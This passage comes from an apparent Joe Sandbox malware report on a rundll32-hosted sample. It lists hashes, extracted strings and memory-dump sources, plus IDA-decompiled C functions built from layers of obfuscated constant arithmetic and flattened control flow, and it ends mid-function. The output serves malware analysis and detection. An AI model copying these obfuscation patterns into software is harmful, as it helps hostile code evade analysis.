Opcode Fuzzy Hash: dfc4d2b2e54516939d1a7f582ef6859113f7f42e62d469bc69eaab2396b0028c
Instruction Fuzzy Hash: 981235725083819FE368CF24C589A5BFBE1BBC5714F008A1DF6D9962A0D7B59909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0029577E, Relevance: 9.1, Strings: 7, Instructions: 375COMMON

Download Yara Rule

Strings

?J, xrefs: 002959FF
rYym, xrefs: 0029583E
F, xrefs: 00295BF2
#, xrefs: 002958C5
q$, xrefs: 00295B0D
6B, xrefs: 002958E5
Dmw, xrefs: 00295D6A

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$6B$?J$Dmw$q$$rYym$F
API String ID: 0-3531653112
Opcode ID: 407f92d60e8f76f2cb6be89abd7ee20f9c8b43191f1194bc458037494b776d1d
Instruction ID: 116798f28ecc44b78fb91558f97a92e49649d17f33c339b8d0e9db541942c292
Opcode Fuzzy Hash: 407f92d60e8f76f2cb6be89abd7ee20f9c8b43191f1194bc458037494b776d1d
Instruction Fuzzy Hash: FD1255726183818FE368CF24C989A5BFBE1BBC5714F10891DF5D9962A0D7B58909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001F421E, Relevance: 9.1, Strings: 7, Instructions: 309
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001F421E() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t360;
				void* _t366;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int* _t420;

				_t420 =  &_v1184;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t366 = 0x68d33d8;
				_v1056 = 0x2e288a;
				_v1052 = 0x75c5fe;
				_v1084 = 0xa8f5;
				_t408 = 0x17;
				_v1084 = _v1084 / _t408;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x001d0b4a;
				_v1112 = 0x1fad;
				_v1112 = _v1112 + 0x32f;
				_v1112 = _v1112 | 0xebab1cec;
				_v1112 = _v1112 ^ 0xebab1aef;
				_v1160 = 0x54dd;
				_t409 = 0x5b;
				_v1160 = _v1160 / _t409;
				_v1160 = _v1160 + 0xffff837a;
				_v1160 = _v1160 >> 0xd;
				_v1160 = _v1160 ^ 0x00079eb6;
				_v1064 = 0x3be9;
				_v1064 = _v1064 + 0xc5e5;
				_v1064 = _v1064 ^ 0x0001038f;
				_v1152 = 0xf3a;
				_v1152 = _v1152 >> 2;
				_v1152 = _v1152 | 0xf0e2a687;
				_v1152 = _v1152 ^ 0xf0e2f519;
				_v1104 = 0x6a02;
				_v1104 = _v1104 ^ 0xd79757ec;
				_v1104 = _v1104 ^ 0x72111d97;
				_v1104 = _v1104 ^ 0xa58624a2;
				_v1180 = 0x1edb;
				_v1180 = _v1180 << 8;
				_v1180 = _v1180 | 0xc66b0f2d;
				_t410 = 0x2a;
				_v1180 = _v1180 * 0x59;
				_v1180 = _v1180 ^ 0x02748563;
				_v1184 = 0xc21d;
				_v1184 = _v1184 + 0xffff4953;
				_v1184 = _v1184 + 0x9d58;
				_v1184 = _v1184 + 0xffffc405;
				_v1184 = _v1184 ^ 0x000079fa;
				_v1068 = 0xa3cf;
				_v1068 = _v1068 << 0xd;
				_v1068 = _v1068 ^ 0x1479d59b;
				_v1096 = 0x8d67;
				_v1096 = _v1096 / _t410;
				_v1096 = _v1096 >> 0xe;
				_v1096 = _v1096 ^ 0x00006505;
				_v1076 = 0xcc46;
				_t411 = 0x5a;
				_v1076 = _v1076 * 0x1b;
				_v1076 = _v1076 ^ 0x0015fa07;
				_v1172 = 0x912b;
				_v1172 = _v1172 ^ 0x3d1f1ee2;
				_v1172 = _v1172 + 0x5bc5;
				_v1172 = _v1172 + 0xeec;
				_v1172 = _v1172 ^ 0x3d1fd618;
				_v1088 = 0xd14f;
				_v1088 = _v1088 / _t411;
				_v1088 = _v1088 << 2;
				_v1088 = _v1088 ^ 0x00001f20;
				_v1060 = 0x3e83;
				_v1060 = _v1060 ^ 0xd304f88f;
				_v1060 = _v1060 ^ 0xd304fa7e;
				_v1168 = 0xb05c;
				_v1168 = _v1168 << 8;
				_t412 = 0x34;
				_v1168 = _v1168 / _t412;
				_v1168 = _v1168 ^ 0xc0861c97;
				_v1168 = _v1168 ^ 0xc0851309;
				_v1108 = 0xe1c2;
				_v1108 = _v1108 ^ 0xa90fabc2;
				_v1108 = _v1108 | 0xcfc04e49;
				_v1108 = _v1108 ^ 0xefcf6bdd;
				_v1140 = 0x68db;
				_t413 = 0x4f;
				_v1140 = _v1140 / _t413;
				_v1140 = _v1140 >> 3;
				_v1140 = _v1140 ^ 0x00007a7a;
				_v1176 = 0x96b;
				_v1176 = _v1176 | 0xfb94fdcf;
				_v1176 = _v1176 << 2;
				_v1176 = _v1176 ^ 0xee53e864;
				_v1124 = 0x2254;
				_v1124 = _v1124 ^ 0xa48881a1;
				_v1124 = _v1124 << 0xb;
				_v1124 = _v1124 ^ 0x451fa827;
				_v1100 = 0x5734;
				_v1100 = _v1100 ^ 0x74517f62;
				_t414 = 7;
				_v1100 = _v1100 * 0x13;
				_v1100 = _v1100 ^ 0xa205a981;
				_v1132 = 0x66ff;
				_v1132 = _v1132 * 0x1f;
				_v1132 = _v1132 + 0xf308;
				_v1132 = _v1132 ^ 0x000d172f;
				_v1080 = 0x2972;
				_v1080 = _v1080 * 0x38;
				_v1080 = _v1080 ^ 0x000935ad;
				_v1116 = 0x9ff8;
				_v1116 = _v1116 >> 0xf;
				_v1116 = _v1116 + 0xfffff067;
				_v1116 = _v1116 ^ 0xffff9674;
				_v1092 = 0x2f3f;
				_v1092 = _v1092 ^ 0x892685f6;
				_v1092 = _v1092 + 0xffff53b4;
				_v1092 = _v1092 ^ 0x8925829b;
				_v1164 = 0xb542;
				_v1164 = _v1164 | 0x5ab5abdf;
				_v1164 = _v1164 + 0xffffa79d;
				_v1164 = _v1164 / _t414;
				_v1164 = _v1164 ^ 0x0cf5716d;
				_v1144 = 0x47b6;
				_v1144 = _v1144 * 0x4c;
				_v1144 = _v1144 | 0xf71f6dca;
				_v1144 = _v1144 ^ 0xf71f15ee;
				_v1072 = 0x81ab;
				_v1072 = _v1072 * 0x49;
				_v1072 = _v1072 ^ 0x00249dbb;
				_v1148 = 0xb5d2;
				_v1148 = _v1148 * 0x6d;
				_t415 = 0x2c;
				_v1148 = _v1148 / _t415;
				_v1148 = _v1148 ^ 0x0001b92b;
				_v1120 = 0xe5fa;
				_v1120 = _v1120 >> 0x10;
				_v1120 = _v1120 >> 9;
				_v1120 = _v1120 ^ 0x00005e7f;
				_v1156 = 0xab36;
				_t416 = 0x43;
				_v1156 = _v1156 / _t416;
				_v1156 = _v1156 >> 5;
				_v1156 = _v1156 << 6;
				_v1156 = _v1156 ^ 0x000049b3;
				_v1128 = 0xa89e;
				_t417 = 0x13;
				_v1128 = _v1128 * 0x34;
				_v1128 = _v1128 / _t417;
				_v1128 = _v1128 ^ 0x0001a301;
				_v1136 = 0xcc9;
				_v1136 = _v1136 + 0xe654;
				_v1136 = _v1136 * 0x71;
				_v1136 = _v1136 ^ 0x006b6140;
				do {
					while(_t366 != 0x68d33d8) {
						if(_t366 == 0xa2fd3bc) {
							_push(0x1f1000);
							_push(_v1152);
							E002063BF(E0020BF25(_v1160, _v1064, __eflags), __eflags, _v1180, _v1184,  &_v520,  *0x2121b0 + 0x234, _v1068,  *0x2121b0 + 0x234,  *0x2121b0 + 0x10, _v1096);
							E0020C5F7(_v1076, _v1172, _v1088, _v1060, _t346);
							_t420 =  &(_t420[0xb]);
							_t366 = 0xcdbf6e0;
							continue;
						}
						if(_t366 == 0xcdbf6e0) {
							E001F7C9A( &_v1040, _v1168, _t366, _v1108, _v1140);
							E0020BAE0( &_v1040,  &_v1040,  &_v1040);
							E00203D7C( &_v1040, __eflags, _v1116, _v1092,  &_v520);
							_t420 =  &(_t420[9]);
							_t366 = 0x3500b19e;
							continue;
						}
						if(_t366 == 0x24c46d14) {
							_t360 = E00208F65();
							L10:
							_t366 = 0xa2fd3bc;
							continue;
						}
						if(_t366 == 0x304a50c6) {
							_t360 = E001F704B();
							goto L10;
						}
						if(_t366 != 0x3500b19e) {
							goto L17;
						}
						 *((short*)(E001F1E13(_v1164, _v1144, _v1072, _v1148,  &_v520))) = 0;
						_t281 =  &_v1156; // 0x6b6140
						return E0020BE71(_v1120,  &_v520,  *_t281, _v1128, _v1136);
					}
					__eflags =  *((intOrPtr*)( *0x2121b0 + 0x22c));
					if(__eflags == 0) {
						_t366 = 0x24c46d14;
						goto L17;
					}
					_t366 = 0x304a50c6;
					continue;
					L17:
					__eflags = _t366 - 0x360d39a3;
				} while (__eflags != 0);
				return _t360;
			}

0x001f421e
0x001f4224
0x001f422e
0x001f4236
0x001f423b
0x001f4246
0x001f4251
0x001f4263
0x001f4268
0x001f426e
0x001f4273
0x001f427b
0x001f4283
0x001f428b
0x001f4293
0x001f429b
0x001f42a7
0x001f42ac
0x001f42b2
0x001f42ba
0x001f42bf
0x001f42c7
0x001f42d2
0x001f42dd
0x001f42e8
0x001f42f0
0x001f42f5
0x001f42fd
0x001f4305
0x001f430d
0x001f4315
0x001f431d
0x001f4325
0x001f432d
0x001f4332
0x001f433f
0x001f4342
0x001f4346
0x001f434e
0x001f4356
0x001f435e
0x001f4366
0x001f436e
0x001f4376
0x001f4381
0x001f4389
0x001f4394
0x001f43a4
0x001f43a8
0x001f43ad
0x001f43b5
0x001f43c8
0x001f43c9
0x001f43cd
0x001f43d5
0x001f43dd
0x001f43e5
0x001f43ed
0x001f43f5
0x001f43fd
0x001f440b
0x001f4411
0x001f4416
0x001f441e
0x001f4429
0x001f4434
0x001f443f
0x001f4447
0x001f4452
0x001f4457
0x001f445d
0x001f4465
0x001f446d
0x001f4475
0x001f447d
0x001f4485
0x001f448d
0x001f4499
0x001f449e
0x001f44a4
0x001f44a9
0x001f44b1
0x001f44b9
0x001f44c1
0x001f44c6
0x001f44ce
0x001f44d6
0x001f44de
0x001f44e3
0x001f44eb
0x001f44f3
0x001f4500
0x001f4501
0x001f4505
0x001f450d
0x001f451a
0x001f451e
0x001f4526
0x001f452e
0x001f453b
0x001f453f
0x001f4547
0x001f454f
0x001f4554
0x001f455c
0x001f4564
0x001f456c
0x001f4574
0x001f457c
0x001f4584
0x001f458c
0x001f4594
0x001f45a2
0x001f45a6
0x001f45ae
0x001f45bb
0x001f45bf
0x001f45c7
0x001f45cf
0x001f45e2
0x001f45e9
0x001f45f4
0x001f4601
0x001f460d
0x001f4612
0x001f4618
0x001f4625
0x001f4632
0x001f463c
0x001f4641
0x001f4649
0x001f4655
0x001f465a
0x001f4660
0x001f4665
0x001f466a
0x001f4672
0x001f467f
0x001f4680
0x001f468a
0x001f468e
0x001f4696
0x001f469e
0x001f46ab
0x001f46af
0x001f46b7
0x001f46b7
0x001f46c5
0x001f47bc
0x001f47c1
0x001f480f
0x001f482e
0x001f4833
0x001f4836
0x00000000
0x001f4836
0x001f46d1
0x001f4765
0x001f4784
0x001f47aa
0x001f47af
0x001f47b2
0x00000000
0x001f47b2
0x001f46d5
0x001f474a
0x001f473f
0x001f473f
0x00000000
0x001f473f
0x001f46d9
0x001f473a
0x00000000
0x001f473a
0x001f46e1
0x00000000
0x00000000
0x001f4718
0x001f471b
0x00000000
0x001f4728
0x001f4845
0x001f484c
0x001f4855
0x00000000
0x001f4855
0x001f484e
0x00000000
0x001f4857
0x001f4857
0x001f4857
0x00000000

Strings

?/, xrefs: 001F4564
dS, xrefs: 001F44C6
4W, xrefs: 001F44EB
r), xrefs: 001F452E
;, xrefs: 001F42C7
T", xrefs: 001F44CE
@ak, xrefs: 001F471B

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4W$?/$@ak$T"$dS$r)$;
API String ID: 0-3846280122
Opcode ID: d161adbd3a5bbe1bfafa0a877346296824b03a5140b3a2560d5298e45558aa86
Instruction ID: faf87c24e29d58e000ea04c40e064466529e63e6270f4c80bab3de7977be0121
Opcode Fuzzy Hash: d161adbd3a5bbe1bfafa0a877346296824b03a5140b3a2560d5298e45558aa86
Instruction Fuzzy Hash: 9EF110715083809FE368CF25C589A9BBBE1FBC5758F10891DF2968A2A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0020EDB9, Relevance: 9.0, Strings: 7, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0020EDB9() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				void* _t250;
				void* _t253;
				void* _t263;
				void* _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int* _t298;

				_t298 =  &_v1660;
				_v1584 = 0xa79a;
				_v1584 = _v1584 + 0xffffb587;
				_t263 = 0x29655c79;
				_v1584 = _v1584 ^ 0x00005d08;
				_v1600 = 0x98d7;
				_v1600 = _v1600 << 3;
				_v1600 = _v1600 >> 2;
				_v1600 = _v1600 ^ 0x00015089;
				_v1576 = 0x4e32;
				_v1576 = _v1576 * 0x22;
				_t289 = 0;
				_v1576 = _v1576 ^ 0x000a4295;
				_v1616 = 0x1d29;
				_v1616 = _v1616 + 0xffff7723;
				_v1616 = _v1616 >> 7;
				_v1616 = _v1616 ^ 0x01ffbac3;
				_v1632 = 0x8dbf;
				_v1632 = _v1632 >> 0xa;
				_t290 = 0x76;
				_v1632 = _v1632 * 0x3a;
				_v1632 = _v1632 | 0x3b821885;
				_v1632 = _v1632 ^ 0x3b827377;
				_v1640 = 0x104a;
				_v1640 = _v1640 / _t290;
				_v1640 = _v1640 >> 0x10;
				_v1640 = _v1640 + 0xffff7725;
				_v1640 = _v1640 ^ 0xffff57b6;
				_v1580 = 0xe6dc;
				_v1580 = _v1580 ^ 0xc8d716f9;
				_v1580 = _v1580 ^ 0xc8d7d197;
				_v1592 = 0xe0fa;
				_t291 = 0x2f;
				_v1592 = _v1592 / _t291;
				_v1592 = _v1592 ^ 0x0000698d;
				_v1564 = 0x5e4f;
				_v1564 = _v1564 + 0xffff7efe;
				_v1564 = _v1564 ^ 0xffffb6a6;
				_v1660 = 0xba44;
				_v1660 = _v1660 * 0x61;
				_v1660 = _v1660 | 0x90c21cb8;
				_v1660 = _v1660 ^ 0xb89d15b1;
				_v1660 = _v1660 ^ 0x285bb090;
				_v1572 = 0x49e8;
				_v1572 = _v1572 | 0x7392aca1;
				_v1572 = _v1572 ^ 0x7392e7ec;
				_v1636 = 0x1558;
				_v1636 = _v1636 + 0xffffdbcc;
				_v1636 = _v1636 + 0xffffaf90;
				_v1636 = _v1636 | 0x27f9081b;
				_v1636 = _v1636 ^ 0xffff923a;
				_v1620 = 0xb008;
				_v1620 = _v1620 ^ 0x6f98128b;
				_v1620 = _v1620 + 0xffff628e;
				_v1620 = _v1620 ^ 0x6f98181c;
				_v1652 = 0x8c98;
				_v1652 = _v1652 + 0xffff2e73;
				_v1652 = _v1652 ^ 0xfa65a217;
				_v1652 = _v1652 ^ 0x9182de5d;
				_v1652 = _v1652 ^ 0x9418af52;
				_v1644 = 0x793;
				_v1644 = _v1644 ^ 0x7d1bb9ea;
				_v1644 = _v1644 << 0xa;
				_v1644 = _v1644 >> 3;
				_v1644 = _v1644 ^ 0x0ddf10b4;
				_v1568 = 0x9636;
				_v1568 = _v1568 << 8;
				_v1568 = _v1568 ^ 0x009600d5;
				_v1648 = 0x45b1;
				_v1648 = _v1648 ^ 0x353fc9cd;
				_v1648 = _v1648 + 0x9448;
				_v1648 = _v1648 + 0xffff2c3a;
				_v1648 = _v1648 ^ 0x353f36fa;
				_v1608 = 0xcb4a;
				_v1608 = _v1608 ^ 0xf323fa50;
				_v1608 = _v1608 + 0xfffff921;
				_v1608 = _v1608 ^ 0xf3231221;
				_v1656 = 0xe414;
				_v1656 = _v1656 << 5;
				_t292 = 0x14;
				_v1656 = _v1656 * 0xb;
				_v1656 = _v1656 / _t292;
				_v1656 = _v1656 ^ 0x000fea65;
				_v1588 = 0xfdd9;
				_v1588 = _v1588 ^ 0x3c6de270;
				_v1588 = _v1588 ^ 0x3c6d203a;
				_v1596 = 0x9110;
				_t293 = 0x5b;
				_v1596 = _v1596 / _t293;
				_v1596 = _v1596 ^ 0xad99dc79;
				_v1596 = _v1596 ^ 0xad99c3bd;
				_v1604 = 0xf5c3;
				_v1604 = _v1604 + 0xffffe486;
				_t294 = 0x52;
				_v1604 = _v1604 / _t294;
				_v1604 = _v1604 ^ 0x00000517;
				_v1612 = 0xce05;
				_v1612 = _v1612 + 0xa493;
				_v1612 = _v1612 | 0x844a9c62;
				_v1612 = _v1612 ^ 0x844bf5c1;
				_v1628 = 0xfbe7;
				_v1628 = _v1628 ^ 0xe81fb84e;
				_v1628 = _v1628 << 0xc;
				_v1628 = _v1628 ^ 0xf43ac181;
				_v1624 = 0x777e;
				_t295 = 0x13;
				_v1624 = _v1624 / _t295;
				_v1624 = _v1624 + 0xbc0b;
				_v1624 = _v1624 ^ 0x0000c134;
				do {
					while(_t263 != 0x1a33eb4b) {
						if(_t263 == 0x29655c79) {
							_push(_t263);
							E001F1D54(_v1600, _t263, _v1576, _v1616, _v1632,  &_v1040, _v1640, _v1584);
							_t298 =  &(_t298[8]);
							_t263 = 0x3af62d5c;
							continue;
						} else {
							_t302 = _t263 - 0x3af62d5c;
							if(_t263 == 0x3af62d5c) {
								_push(0x1f1020);
								_push(_v1564);
								_t253 = E0020BF25(_v1580, _v1592, _t302);
								E002073C0( &_v1560, _t302);
								E001F3482(_v1572, _t302,  &_v1040,  &_v520, _v1636, _v1620,  &_v1560,  *0x2121b0 + 0x234, 0x104,  *0x2121b0 + 0x10, _t253, _v1652, _v1644, _v1568);
								E0020C5F7(_v1648, _v1608, _v1656, _v1588, _t253);
								_t298 =  &(_t298[0x11]);
								_t263 = 0x1a33eb4b;
								continue;
							}
						}
						goto L7;
					}
					_push(_v1624);
					_push(0);
					_push( &_v520);
					_push(_t263);
					_push(_v1628);
					_push(_v1612);
					_push(0);
					_push(0);
					_t250 = E002089F6(_v1596, _v1604, __eflags);
					_t298 =  &(_t298[8]);
					__eflags = _t250;
					_t289 =  !=  ? 1 : _t289;
					_t263 = 0x29dc45dd;
					L7:
					__eflags = _t263 - 0x29dc45dd;
				} while (__eflags != 0);
				return _t289;
			}

0x0020edb9
0x0020edbf
0x0020edc9
0x0020edd1
0x0020edd6
0x0020edde
0x0020ede6
0x0020edeb
0x0020edf0
0x0020edf8
0x0020ee0a
0x0020ee0e
0x0020ee10
0x0020ee18
0x0020ee20
0x0020ee28
0x0020ee2d
0x0020ee35
0x0020ee3d
0x0020ee47
0x0020ee4a
0x0020ee4e
0x0020ee56
0x0020ee5e
0x0020ee6e
0x0020ee72
0x0020ee77
0x0020ee7f
0x0020ee87
0x0020ee8f
0x0020ee97
0x0020ee9f
0x0020eeab
0x0020eeae
0x0020eeb2
0x0020eeba
0x0020eec2
0x0020eeca
0x0020eed2
0x0020eedf
0x0020eee3
0x0020eeeb
0x0020eef3
0x0020eefb
0x0020ef03
0x0020ef0b
0x0020ef13
0x0020ef1b
0x0020ef23
0x0020ef2b
0x0020ef33
0x0020ef3b
0x0020ef43
0x0020ef4b
0x0020ef53
0x0020ef5b
0x0020ef63
0x0020ef6b
0x0020ef73
0x0020ef7b
0x0020ef83
0x0020ef8b
0x0020ef93
0x0020ef98
0x0020ef9d
0x0020efa5
0x0020efad
0x0020efb2
0x0020efba
0x0020efc4
0x0020efd1
0x0020efd9
0x0020efe1
0x0020efe9
0x0020eff1
0x0020eff9
0x0020f001
0x0020f009
0x0020f011
0x0020f01d
0x0020f020
0x0020f02c
0x0020f030
0x0020f038
0x0020f040
0x0020f048
0x0020f050
0x0020f05c
0x0020f061
0x0020f067
0x0020f06f
0x0020f077
0x0020f07f
0x0020f08b
0x0020f090
0x0020f096
0x0020f09e
0x0020f0a6
0x0020f0ae
0x0020f0b6
0x0020f0be
0x0020f0c6
0x0020f0ce
0x0020f0d3
0x0020f0db
0x0020f0e7
0x0020f0ea
0x0020f0ee
0x0020f0f6
0x0020f0fe
0x0020f0fe
0x0020f110
0x0020f1bb
0x0020f1dd
0x0020f1e2
0x0020f1e5
0x00000000
0x0020f116
0x0020f116
0x0020f118
0x0020f11e
0x0020f123
0x0020f12f
0x0020f13a
0x0020f18d
0x0020f1a9
0x0020f1ae
0x0020f1b1
0x00000000
0x0020f1b1
0x0020f118
0x00000000
0x0020f110
0x0020f1ec
0x0020f1f7
0x0020f1f9
0x0020f1fa
0x0020f1fb
0x0020f1ff
0x0020f20b
0x0020f20d
0x0020f20f
0x0020f216
0x0020f21a
0x0020f21c
0x0020f21f
0x0020f224
0x0020f224
0x0020f224
0x0020f23b

Strings

: m<, xrefs: 0020F048
y\e), xrefs: 0020F10A
O^, xrefs: 0020EEBA
2N, xrefs: 0020EDF8
I, xrefs: 0020EEFB
y\e), xrefs: 0020EDD1
~w, xrefs: 0020F0DB

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2N$: m<$O^$y\e)$y\e)$~w$I
API String ID: 0-1365918997
Opcode ID: 0c44cc478875206e8dd94a94eb328d6186b54261c402de0b27c95c22ae9a3d9e
Instruction ID: 86eece020e172ff3cb822e2c32c8de6faee198f171513e5d9f97184238b0c637
Opcode Fuzzy Hash: 0c44cc478875206e8dd94a94eb328d6186b54261c402de0b27c95c22ae9a3d9e
Instruction Fuzzy Hash: 7DB112B11083819FD3A8CF65C98995BFBF1BBC4758F108A1DF196962A0D7B58909CF83

Uniqueness

Uniqueness Score: -1.00%

Function 002AE32D, Relevance: 9.0, Strings: 7, Instructions: 225COMMON

Download Yara Rule

Strings

y\e), xrefs: 002AE345
~w, xrefs: 002AE64F
: m<, xrefs: 002AE5BC
y\e), xrefs: 002AE67E
O^, xrefs: 002AE42E
2N, xrefs: 002AE36C
I, xrefs: 002AE46F

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2N$: m<$O^$y\e)$y\e)$~w$I
API String ID: 0-1365918997
Opcode ID: 997a9bc5a09c9b359ad3a93ceaa147acc8105350cac2800059957ff2cb302b92
Instruction ID: 5c227717b565f4ded97c6f1223bbabb3d985ce6868f272a3507d800c0eb3fa17
Opcode Fuzzy Hash: 997a9bc5a09c9b359ad3a93ceaa147acc8105350cac2800059957ff2cb302b92
Instruction Fuzzy Hash: 7CB111B11183819FD3A8CF65C98A95BFBE1BBC4748F108A1DF196862A0D7B58919CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00204693, Relevance: 7.9, Strings: 6, Instructions: 366
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00204693(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _t341;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				void* _t414;
				signed int* _t461;
				void* _t462;
				signed int _t463;
				signed int* _t466;
				void* _t469;

				_push(_a8);
				_t461 = _a4;
				_t462 = __ecx;
				_push(_t461);
				_push(__ecx);
				E001F56B2(_t341);
				_v56 = _v56 & 0x00000000;
				_t466 =  &(( &_v192)[4]);
				_v60 = 0x669039;
				_v192 = 0x43d8;
				_t414 = 0x3f50d67;
				_v192 = _v192 + 0xbf58;
				_v192 = _v192 << 6;
				_t403 = 0x63;
				_v192 = _v192 / _t403;
				_v192 = _v192 ^ 0x0000f3e0;
				_v124 = 0xc4a4;
				_v124 = _v124 + 0x7400;
				_v124 = _v124 << 8;
				_v124 = _v124 ^ 0x01388cfe;
				_v156 = 0x33d6;
				_v156 = _v156 << 0xa;
				_v156 = _v156 << 2;
				_t404 = 0x3d;
				_v156 = _v156 / _t404;
				_v156 = _v156 ^ 0x000de827;
				_v64 = 0xebcf;
				_v64 = _v64 << 6;
				_v64 = _v64 ^ 0x003ae596;
				_v172 = 0x968a;
				_v172 = _v172 + 0xffffd46d;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0xd191ab81;
				_v172 = _v172 ^ 0xd192e477;
				_v128 = 0xb9a8;
				_v128 = _v128 >> 0x10;
				_t405 = 0x76;
				_v128 = _v128 * 0x5e;
				_v128 = _v128 ^ 0x000020d6;
				_v140 = 0x545;
				_v140 = _v140 << 7;
				_v140 = _v140 ^ 0xc4bcec74;
				_v140 = _v140 ^ 0xc4be45d2;
				_v176 = 0xd323;
				_v176 = _v176 ^ 0x784c5418;
				_v176 = _v176 << 0xc;
				_v176 = _v176 / _t405;
				_v176 = _v176 ^ 0x01b2deaa;
				_v184 = 0x38a8;
				_v184 = _v184 * 0x62;
				_v184 = _v184 | 0x92387752;
				_v184 = _v184 * 0x36;
				_v184 = _v184 ^ 0xd91272a1;
				_v68 = 0x8687;
				_v68 = _v68 | 0x8796c77c;
				_v68 = _v68 ^ 0x8796e993;
				_v84 = 0x4bf9;
				_v84 = _v84 ^ 0xc2db0559;
				_v84 = _v84 ^ 0xc2db1bd4;
				_v152 = 0xec5b;
				_v152 = _v152 * 0x77;
				_t406 = 0x48;
				_v152 = _v152 / _t406;
				_v152 = _v152 << 1;
				_v152 = _v152 ^ 0x00037fba;
				_v96 = 0x6f52;
				_v96 = _v96 / _t406;
				_v96 = _v96 ^ 0x00007059;
				_v144 = 0x2d9f;
				_v144 = _v144 + 0x5a02;
				_v144 = _v144 + 0xffff7526;
				_t407 = 0x14;
				_v144 = _v144 * 0x64;
				_v144 = _v144 ^ 0xfffec776;
				_v104 = 0x3779;
				_v104 = _v104 + 0x6440;
				_v104 = _v104 ^ 0x0000977f;
				_v148 = 0x1d77;
				_v148 = _v148 * 0x7c;
				_v148 = _v148 / _t407;
				_v148 = _v148 + 0xffff1bf8;
				_v148 = _v148 ^ 0xffffcd98;
				_v100 = 0xd3a2;
				_v100 = _v100 | 0xe4f90cf7;
				_v100 = _v100 ^ 0xe4f9cd3c;
				_v180 = 0x5cac;
				_v180 = _v180 + 0xffff9624;
				_v180 = _v180 + 0xffff4ad1;
				_v180 = _v180 << 2;
				_v180 = _v180 ^ 0xfffcf483;
				_v108 = 0x7cb5;
				_t408 = 0x18;
				_v108 = _v108 * 0x12;
				_v108 = _v108 ^ 0x000894d5;
				_v116 = 0x5a78;
				_v116 = _v116 / _t408;
				_v116 = _v116 + 0x27ad;
				_v116 = _v116 ^ 0x00004e34;
				_v76 = 0x7bae;
				_t409 = 0x47;
				_v76 = _v76 / _t409;
				_v76 = _v76 ^ 0x00000ced;
				_v112 = 0x9931;
				_v112 = _v112 + 0x6c1;
				_v112 = _v112 + 0xc184;
				_v112 = _v112 ^ 0x000135f5;
				_v120 = 0x43fe;
